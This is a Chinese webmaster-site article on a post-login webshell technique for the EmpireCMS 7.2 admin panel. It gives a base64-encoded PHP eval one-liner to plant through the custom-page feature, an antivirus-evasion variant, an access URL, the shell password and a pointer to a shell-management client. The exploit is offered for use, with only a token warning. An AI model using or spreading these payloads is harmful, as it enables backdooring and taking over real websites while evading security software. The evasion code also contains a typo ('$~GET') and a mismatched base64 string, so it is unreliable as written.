当前位置:站长啦网站目录 » 站长资讯 » 站长新闻 » 漏洞预警 » 文章详细

帝国cms 7.2后台拿shell empirecms 7.2后台一句话漏洞免杀版

来源:EmpireCMS7.2漏洞 浏览:720次 时间:2016-09-07
福州SEO优化找雨过天晴工作室

帝国cms 7.2后台拿shell,帝国cms 7.2 webshell,帝国cms 7.2漏洞利用,帝国cms7.2 漏洞,帝国cms最新漏洞,empirecms 7.2 漏洞,empirecms 7.2 shell,empirecms 7.2 漏洞利用,EmpireCMS(帝国cms)
      大家都知道帝国cms的安全性能也是数一数二的,很多做SEO的站都选择了帝国cms。雨过天晴工作室对帝国也是很认可,在使用的过程中,发现帝国cms7.2有一个漏洞,可以直接拿shell,如果内容直接添一句话或者php大马是无用的,因为他会生成xxx.php前先给你执行!
 但是如果利用script就可以,在后台栏目-自定义页面-增加自定义页面-随便写了xxx.php文件名,
 页面内容填写,<script language="php">echo base64_decode("PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4=");</script>
(PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4= 就是 <?php @eval($_POST['cmd']);?>的base64加密。)
 所以生成xxx.php后 会出现内容 <?php @eval($_POST['cmd']);?> 在文件里,然后用菜刀直接连接吧!!
 
如果说,服务器安装了杀软 默认的这种是直接被杀掉的。
我写了一个免杀的一句话 在护卫神已经测试过免杀 其他的其他大伙再进行测试吧。!


<script language="php">
$as=$_GET['code'];
$sd=$~GET['sd'];
if($as==211){
$t="PD9waHAg".$sd;
}else{
$t=123;
}
echo base64_decode($t."=");</script>


一句话地址://127.0.0.1/test.php?code=211&sd=QGV2YWwoJF9QTlNUWydjbWQnXSk7Pz4


密码是cmd 
不过说下 这个适合那种留后面的一句话使用 如果说 不知道后台账号密码的话也是白搭


需要代码直接联系QQ客服 请勿做危险之事